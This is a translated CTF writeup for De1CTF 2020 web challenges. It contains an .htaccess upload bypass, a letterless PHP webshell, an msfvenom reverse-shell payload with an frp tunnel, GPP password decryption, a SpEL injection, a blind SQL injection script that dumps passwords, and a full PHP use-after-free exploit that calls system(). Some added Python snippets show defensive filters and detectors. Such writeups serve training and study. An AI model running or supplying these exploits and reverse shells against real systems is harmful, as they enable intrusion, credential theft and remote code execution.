2020De1CTF_Web_Wp


check in

Unintended solution

The filename filter blocks `ph`.
The file content filter blocks `perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet`.
So consider uploading a `.htaccess` instead.
payload:

```apache
AddType application/x-httpd-p\
hp .xxx
```

The backslash line continuation splits `php` across two lines, so the content filter never sees `ph`, while Apache joins the two lines when it parses the directive.
The file body uses a PHP short tag, so `php` does not appear there either:

```php
<?= system("cat /flag");
```
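As an added example (mine, not code from the writeup or the challenge), a Python check that applies the blocklist quoted above to the raw upload and then again after joining Apache-style backslash continuations, plus a refusal of dot-files; the function names are my own.

```python
import re

# Content blocklist quoted in the writeup; "ph" is the entry that should have
# caught "application/x-httpd-php".
CONTENT_BLOCKLIST = re.compile(
    r"perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet")

# Constructed copy of the writeup's .htaccess: the backslash continuation
# splits "php" across two lines.
HTACCESS_PAYLOAD = "AddType application/x-httpd-p\\\nhp .xxx\n"


def naive_check(content):
    """Blocklist applied to the raw bytes, as the challenge did. True = allowed."""
    return CONTENT_BLOCKLIST.search(content) is None


def join_continuations(content):
    """Apache merges a line ending in a backslash with the next line before it
    parses the directive, so normalise the same way before filtering."""
    return re.sub(r"\\\r?\n", "", content)


def hardened_check(filename, content):
    """Refuse dot-files such as .htaccess outright (an upload directory should
    never accept server configuration) and filter the normalised body."""
    base = filename.rsplit("/", 1)[-1]
    if base.startswith("."):
        return False
    return CONTENT_BLOCKLIST.search(join_continuations(content)) is None
```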

Intended solution

Use CGI.
payload (I did not get this to work in the challenge environment, but it is feasible):
`.htaccess`:

```apache
Options +ExecCGI
AddHandler cgi-script .xxx
```

`1.xxx`:

```bash
#!/bin/bash
touch 3.txt
cp /flag* ./3.txt
```

Hard_Pentest_1

Webshell without letters or digits

```php
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
        !in_array($exts, $BlackExts) &&
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
        return true;
    }
    return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="submit">
</form>

</body>
</html>
```

Upload exploit:

```php
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>
```

POST:

```text
__=system&_=echo ^<?php eval($_REQUEST[a]); > a.php
```
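As an added example (my code, not the challenge's), a Python port of the Check() function above beside a hardened variant that allowlists extensions and looks for a PHP open tag instead of banning characters; the sample content is the first few tags of the payload above, and the allowed-extension set is an assumption.

```python
import re

# Port of the challenge's Check(): a character blocklist, a one-entry
# extension blocklist ("php") and a ".." check.
BLOCKED_CHARS = re.compile(r"[a-z0-9;~^`&|]", re.I | re.S)
BLOCKED_EXTS = {"php"}


def challenge_check(filename, content):
    """True = the upload is accepted, as in the original Check()."""
    ext = filename.rsplit(".", 1)[-1].strip()
    return (BLOCKED_CHARS.search(content.decode("latin-1")) is None
            and ext not in BLOCKED_EXTS
            and ".." not in filename)


# Hardened variant: an allowlist of extensions (assumed set) and a search for a
# PHP open tag. "<?=" contains no letter or digit, which is exactly why the
# character blocklist above cannot express this rule.
ALLOWED_EXTS = {"jpg", "png", "gif", "txt"}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.I)


def hardened_check(filename, content):
    """True = accepted: known-harmless extension, no traversal, no PHP tag."""
    ext = filename.rsplit(".", 1)[-1].strip().lower()
    return (ext in ALLOWED_EXTS
            and ".." not in filename
            and PHP_OPEN_TAG.search(content) is None)


# Constructed samples: the opening tags of the writeup's letterless webshell
# and a benign text file.
LETTERLESS_WEBSHELL = b"<?=$_=[]?><?=$_=@\"$_\"?><?=$_=$_['!'=='@']?><?=$___=$_?>"
BENIGN = b"hello from a text file"
```

Note that the original filter also rejects the benign file, because ordinary text contains letters; the hardened check accepts it and rejects the webshell.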

Connect with AntSword (蚁剑) to get a webshell, then generate a trojan with msf for a reverse shell.

```shell
# windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=5820 -f exe -o test.exe
```

frpc configuration:

```ini
[common]
server_addr = 公网ip
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5820
remote_port = 5820
```

Put the generated .exe on 47.113.219.76 and run it, then:

```shell
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 5820
exploit
```

Read domain user credentials through the GPP (Group Policy Preferences) vulnerability:

```cmd
dir /s /a \\192.168.0.12\SYSVOL\*.xml
type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
```

Take the cpassword value and decrypt it with gpp-decrypt:

```text
uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08

dkk@kali:~$ gpp-decrypt uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
zL1PpP@sSwO3d
```
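From the defender's side, the finding above is a cpassword attribute left in a preferences XML under SYSVOL. As an added example (mine, not part of the writeup), a Python scanner that reports every such attribute; the sample XML and its cpassword value are constructed placeholders, not the challenge's file.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample modelled on a Group Policy Preferences Groups.xml; the
# cpassword value is a placeholder, not the one recovered in the challenge.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" changed="2020-05-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" newName=""
      cpassword="PLACEHOLDER_BASE64_CPASSWORD" changeLogon="0" noChange="1"/>
  </User>
</Groups>
"""

# Attribute names that identify the account in the different preference
# types (Groups, Services, ScheduledTasks, DataSources, Drives).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source="Groups.xml"):
    """Return one (source, tag, account, cpassword) tuple per element that
    carries a cpassword attribute, at any depth of the document."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        findings.append((source, elem.tag, account, cpw))
    return findings


def scan_sysvol(root):
    """Walk a copy of the SYSVOL share and report every preferences XML that
    still stores a cpassword."""
    findings = []
    for xml_file in Path(root).rglob("*.xml"):
        try:
            text = xml_file.read_text(encoding="utf-8-sig")
            findings.extend(find_cpasswords(text, str(xml_file)))
        except (ET.ParseError, UnicodeDecodeError):
            continue  # not every .xml under SYSVOL is a preferences file
    return findings
```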

This gives the flag and the hint for the next challenge:

```text
flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.
```

calc

A Java challenge... not really my area.
The challenge is not hard, but I never studied Java properly.
payload:
`http://106.52.164.141/spel/calc?calc=nEW java.io.BufferedReader(nEW java.io.FileReader("/flag")).readLine()`
Mixed case (`nEW` instead of `new`) bypasses the filter.

mixture

Testing showed that every account except admin can be logged into with any password.
The /member.php page contains the comment `<!--orderby-->`.
Submitting `member.php?orderby=sleep` returns a filter message; in CTFs, wherever there is a filter there is a hole.

```python
#!/usr/bin/env python
# Time-based blind injection through the orderby parameter: a binary search
# over the ASCII range 0..127, one character at a time. benchmark() makes the
# response slow when the comparison is true.
import requests
import time

flag = ""
header = {"Cookie": "PHPSESSID=8985l543q88ke4ltd1trnum9e0"}


def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])


for i in range(1, 50):
    print(i)
    n = 2          # 2 = no comparison result yet for this character
    m = 128 // 2   # current guess
    j = 128 // 2   # step size, halved every round
    for q in range(1, 8):
        if q != 1:
            j = j // 2
        if n == 1:
            m = m + j
        elif n == 0:
            m = m - j
        # exp = "and(case when ascii(mid((select user())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format(i, m)
        # exp = "and(case when ascii(mid((select database())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format(i, m)
        # exp = "and(case when ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database())from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format(i, m)
        # exp = "and(case when ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='member')from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format(i, m)
        exp = "and(case when ascii(mid((select group_concat(password) from member)from({})for(1)))>{} then benchmark(160000,sha(1)) else 'b' end)".format(i, m)
        url = 'http://134.175.185.244/member.php?orderby={}'.format(exp)
        print(m)
        startTime = time.time()
        p = requests.get(url, timeout=100, headers=header)
        if time.time() - startTime > 4:
            n = 1   # ascii(char) > m
        else:
            n = 0   # ascii(char) <= m
        if q == 7:
            if time.time() - startTime > 4:
                flag = flag + chr(m + 1)
            else:
                flag = flag + chr(m)
            print(flag)
```
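The script above leaves a distinctive trace: repeated requests from one client with `benchmark()` inside a `case when` on the same parameter, alternating slow and fast. As an added example (my code, not the writeup's), a Python parser over constructed access-log lines that flags these requests; the log format with a trailing request-duration field is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format plus the request duration in
# seconds as a trailing field, as nginx's $request_time would give). The
# second and third lines carry the writeup's benchmark()-based payload.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2020:10:00:01 +0000] "GET /member.php?orderby=id HTTP/1.1" 200 512 0.012
10.0.0.5 - - [03/May/2020:10:00:02 +0000] "GET /member.php?orderby=and(case%20when%20ascii(mid((select%20user())from(1)for(1)))>64%20then%20benchmark(160000,sha(1))%20else%20'b'%20end) HTTP/1.1" 200 512 5.231
10.0.0.5 - - [03/May/2020:10:00:08 +0000] "GET /member.php?orderby=and(case%20when%20ascii(mid((select%20user())from(1)for(1)))>96%20then%20benchmark(160000,sha(1))%20else%20'b'%20end) HTTP/1.1" 200 512 0.015
10.0.0.9 - - [03/May/2020:10:00:09 +0000] "GET /member.php?orderby=sleep HTTP/1.1" 200 480 0.010
"""

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \d+ ([\d.]+)$')
# Timing primitives and the CASE WHEN wrapper used for conditional delays.
TIMING_SQLI = re.compile(r"\b(benchmark|sleep)\s*\(|\bcase\s+when\b", re.I)


def classify(line, slow_threshold=2.0):
    """Parse one log line; return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group(2)).partition("?")[2]
    return {
        "src": m.group(1),
        "query": query,
        "sqli_pattern": TIMING_SQLI.search(query) is not None,
        "slow": float(m.group(4)) >= slow_threshold,
    }


def suspicious_sources(log_text, slow_threshold=2.0):
    """Count, per client address, requests whose query string carries a timing
    payload. A mix of slow and fast hits from one address, with the compared
    value changing each time, is the binary-search signature of the script."""
    counts = {}
    for line in log_text.splitlines():
        r = classify(line, slow_threshold)
        if r and r["sqli_pattern"]:
            counts[r["src"]] = counts.get(r["src"], 0) + 1
    return counts
```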

It is a web-pwn challenge; I could not get much further.

Easy PHP UAF

exp:

```php
//<?php

pwn("ls");

function hex($val)
{
    return "0x".dechex($val)."<br>";
}

function pwn($cmd) {
    global $abc, $helper, $backtrace, $backtrace2;

    class Vuln {
        public $a;
        public function __destruct() {
            global $backtrace;
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function allocate(&$a, $depth)
    {
        if ($depth === 0) return;
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        $a[] = str_shuffle(str_repeat('A', 0x180-0x18-1));
        allocate($a, $depth - 1);
    }

    function str2ptr(&$str, $p = 0) {
        $address = 0;
        $address |= ord($str[$p+7]);
        $address <<= 8;
        $address |= ord($str[$p+6]);
        $address <<= 8;
        $address |= ord($str[$p+5]);
        $address <<= 8;
        $address |= ord($str[$p+4]);
        $address <<= 8;
        $address |= ord($str[$p+3]);
        $address <<= 8;
        $address |= ord($str[$p+2]);
        $address <<= 8;
        $address |= ord($str[$p+1]);
        $address <<= 8;
        $address |= ord($str[$p+0]);
        return $address;
    }

    function write(&$str, $p, $v)
    {
        $str[$p+0] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+1] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+2] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+3] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+4] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+5] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+6] = chr($v & 0xff);
        $v >>= 8;
        $str[$p+7] = chr($v & 0xff);
    }

    function memRead($addr)
    {
        global $abc, $helper;
        write($abc, 0xa8, $addr - 0x10);
        return strlen($helper->a);
    }

    function trigger_uaf($arg) {
        # str_shuffle prevents opcache string interning
        $arg = str_shuffle(str_repeat('A', 79));
        $vuln = new Vuln();
        $vuln->a = $arg;
    }
    $contiguous = [];
    allocate($contiguous, 0);

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->a = $helper;
    $helper->b = function($x) {};
    $helper->c = 0x1337;

    if (strlen($abc) == 79 /*|| strlen($abc) == 0*/)
    {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x10);
    $helper->a = "helper"; // otherwise a strange crash
    $abc_addr = $php_heap + 0x18;
    $libphp_addr = str2ptr($abc, 0) - 0xd73ec0;
    $zif_system = $libphp_addr + 0x355a86;
    $helper->b = function($x){};
    $closure_obj = str2ptr($abc, 0x20);
    echo ("abc_addr = ".hex($abc_addr));
    echo ("libphp_addr = ".hex($libphp_addr));
    echo ("zif_system = ".hex($zif_system));
    echo ("closure_obj = ".hex($closure_obj));
    echo ("<br>");

    // fake value
    write($abc, 0x10, $closure_obj);
    write($abc, 0x18, 0x6);

    function copyFunc($off)
    {
        global $helper;
        global $abc;
        if ($off > 0x110) return;
        write($abc, 0xd0 + 0x18 + $off, str2ptr($helper->a, $off));
        write($abc, 0xd0 + 0x20 + $off, str2ptr($helper->a, $off+8));
        write($abc, 0xd0 + 0x28 + $off, str2ptr($helper->a, $off+0x10));
        write($abc, 0xd0 + 0x30 + $off, str2ptr($helper->a, $off+0x18));
        write($abc, 0xd0 + 0x38 + $off, str2ptr($helper->a, $off+0x20));
        write($abc, 0xd0 + 0x40 + $off, str2ptr($helper->a, $off+0x28));
        write($abc, 0xd0 + 0x48 + $off, str2ptr($helper->a, $off+0x30));
        write($abc, 0xd0 + 0x50 + $off, str2ptr($helper->a, $off+0x38));
        write($abc, 0xd0 + 0x58 + $off, str2ptr($helper->a, $off+0x40));
        write($abc, 0xd0 + 0x60 + $off, str2ptr($helper->a, $off+0x48));
        write($abc, 0xd0 + 0x68 + $off, str2ptr($helper->a, $off+0x50));
        write($abc, 0xd0 + 0x70 + $off, str2ptr($helper->a, $off+0x58));
        write($abc, 0xd0 + 0x78 + $off, str2ptr($helper->a, $off+0x60));
        write($abc, 0xd0 + 0x80 + $off, str2ptr($helper->a, $off+0x68));
        write($abc, 0xd0 + 0x88 + $off, str2ptr($helper->a, $off+0x70));
        write($abc, 0xd0 + 0x90 + $off, str2ptr($helper->a, $off+0x78));
        write($abc, 0xd0 + 0x98 + $off, str2ptr($helper->a, $off+0x80));
        write($abc, 0xd0 + 0xa0 + $off, str2ptr($helper->a, $off+0x88));
        copyFunc($off + 0x90);
    }

    write($abc, 0xd0, 0x0000031800000002);
    write($abc, 0xd0 + 8, 0x0000000000000003);
    copyFunc(0);

    write($abc, 0xd0 + 0x38, 0x0210000000000001);
    write($abc, 0xd0 + 0x68, $zif_system);
    write($abc, 0x20, $abc_addr + 0xd0);

    ($helper->b)($cmd);
    die("end");

}
```